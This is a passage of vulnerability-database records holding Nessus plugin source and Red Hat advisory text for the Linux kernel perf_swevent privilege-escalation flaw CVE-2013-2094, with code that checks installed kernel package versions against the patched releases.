ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-43-generic\", pkgver:\"3.2.0-43.68\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-43-generic-pae\", pkgver:\"3.2.0-43.68\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-43-highbank\", pkgver:\"3.2.0-43.68\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-43-virtual\", pkgver:\"3.2.0-43.68\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:12:34", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.2 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.", "edition": 25, "published": "2013-05-21T00:00:00", "title": "RHEL 6 : kernel (RHSA-2013:0840)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-21T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2013-0840.NASL", "href": "https://www.tenable.com/plugins/nessus/66524", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0840. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66524);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_bugtraq_id(59846);\n script_xref(name:\"RHSA\", value:\"2013:0840\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2013:0840)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.2 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.\"\n );\n # https://access.redhat.com/site/solutions/373743\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/373743\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-0542.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0840\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2094\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2013:0840\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0840\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"python-perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"python-perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-220.34.2.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:12:33", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.", "edition": 27, "published": "2013-05-17T00:00:00", "title": "RHEL 6 : kernel (RHSA-2013:0830)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-17T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2013-0830.NASL", "href": "https://www.tenable.com/plugins/nessus/66488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0830. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66488);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"RHSA\", value:\"2013:0830\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2013:0830)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.\"\n );\n # https://access.redhat.com/site/solutions/373743\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/373743\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-0542.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2094\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2013:0830\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0830\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n 